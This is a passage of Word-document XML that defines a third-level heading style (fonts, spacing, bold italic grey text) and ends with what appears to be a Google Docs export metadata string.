  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="100" w:before="160" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>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Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="666666"/>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Rs3QyCuyt792i4nq6UaUXm2Fw==">CgMxLjA4AHIhMTRER3FfbDZnTVVBb084RE9xMTRqS1hBMXd3QTQwMDBD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